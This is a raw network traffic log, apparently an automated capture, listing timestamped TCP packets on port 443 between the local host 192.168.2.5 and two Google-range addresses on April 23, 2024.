                                                                                Apr 23, 2024 08:04:56.889542103 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.889575958 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.889580011 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.890422106 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.890455961 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.890460014 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.891170979 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.891210079 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.891213894 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.891829967 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.891879082 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.891881943 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.892647028 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.892693043 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.892697096 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.893486977 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.893521070 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.893523932 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.894247055 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.894287109 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.894290924 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.895009041 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.895049095 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.895051956 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.895855904 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.895893097 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.895896912 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.896586895 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.896627903 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.896631956 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.897422075 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.897464991 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.897468090 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.898161888 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.898197889 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.898201942 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.898932934 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.898967028 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.898971081 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.899801970 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.899835110 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.899838924 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.900470972 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.900504112 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.900507927 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.901213884 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.901249886 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.901253939 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.901962042 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.901999950 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.902003050 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.902782917 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.902817011 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.902821064 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.903454065 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.903491974 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.903495073 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.904294014 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.904335022 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.904339075 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.905078888 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.905116081 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.905119896 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.905695915 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.905734062 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.905736923 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.906393051 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.906430006 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.906434059 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.906505108 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.906548977 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.906960964 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:32.170120955 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.170170069 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.170243979 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.181749105 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.181771994 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.368221045 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.368356943 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.368876934 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.368932009 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.423995972 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.424037933 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.424427986 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.424524069 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.427191019 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.468115091 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.572807074 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.572947979 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.572978020 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.572993040 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.573024988 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.573046923 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.574421883 CEST49714443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:05:32.574440002 CEST44349714142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:05:32.590684891 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:32.590729952 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:32.590821981 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:32.591171026 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:32.591185093 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:32.781971931 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:32.782105923 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:32.788589954 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:32.788608074 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:32.788801908 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:32.788865089 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:32.789223909 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:32.836112022 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.479558945 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.479651928 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.485604048 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.485698938 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.498102903 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.498306990 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.504353046 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.504411936 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.504422903 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.504466057 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.567023039 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.567135096 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.567151070 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.567214966 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.570041895 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.570094109 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.570101976 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.570146084 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.576427937 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.576487064 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.576510906 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.576656103 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.582722902 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.583599091 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.583606005 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.583646059 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.588998079 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.589576960 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.589591026 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.589643002 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.595288992 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.595597029 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.595614910 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.595684052 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.601613998 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.604585886 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.604603052 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.604657888 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.607908010 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.607973099 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.608001947 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.608048916 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.613991976 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.614053965 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.614104986 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.614279032 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.620069981 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.620135069 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.620156050 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.620197058 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.626140118 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.628575087 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.628590107 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.628638029 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.632205963 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.635267973 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.635339975 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.635354996 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.637567997 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.641375065 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.643590927 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.643610954 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.643647909 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.654692888 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.655607939 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.655632019 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.655673981 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.657581091 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.661571026 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.661593914 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.662862062 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.663203955 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.663243055 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.663252115 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.663285971 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.668477058 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.668525934 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.668540955 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.668584108 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.673506975 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.676603079 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.676618099 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.676667929 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.678246021 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.678292036 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.678303003 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.678308964 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.678328037 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.678359032 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.682789087 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.685551882 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.685558081 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.685592890 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.687133074 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.687311888 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.687318087 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.687362909 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.691260099 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.691566944 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.691571951 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.691607952 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.695528984 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.697542906 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.697550058 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.697587013 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.699826002 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.699871063 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.701930046 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.702151060 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.702172041 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.702209949 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.706238985 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.706316948 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.706326962 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.706372023 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.710535049 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.711788893 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.711797953 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.711836100 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.714449883 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.714492083 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.714498043 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.714554071 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.718661070 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.718988895 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.718996048 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.719027996 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.722389936 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.724554062 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.724559069 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.724594116 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.726082087 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.726131916 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.726136923 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.726166964 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.729778051 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.730952978 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.730958939 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.730988979 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.733527899 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.733568907 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.733575106 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.733630896 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.737041950 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.737107038 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.737113953 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.737253904 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.740582943 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.742641926 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.742647886 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.742677927 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.744107008 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.744144917 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.744151115 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.744189978 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.747591019 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.748563051 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.749391079 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.749432087 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.749437094 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.749515057 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.752912998 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.752959013 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.752978086 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.753014088 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.755090952 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.755131960 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.755146980 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.755184889 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.757261992 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.757299900 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.757306099 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.757335901 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.759622097 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.759664059 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.759767056 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.759804010 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.761646032 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.761682034 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.761781931 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.761816025 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.763794899 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.763830900 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.763958931 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.763999939 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.766129971 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.766400099 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.766407967 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.766443968 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.768071890 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.768107891 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.768165112 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.768198967 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.768204927 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.768239975 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.770273924 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.770312071 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.770364046 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.770399094 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.772370100 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.772407055 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.772447109 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.772480965 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.774539948 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.774580002 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.774600029 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.774633884 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.776663065 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.776705980 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.777667999 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.777705908 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.777725935 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.777760029 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.779792070 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.779829979 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.779872894 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.779906988 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.781927109 CEST44349715142.250.64.97192.168.2.5
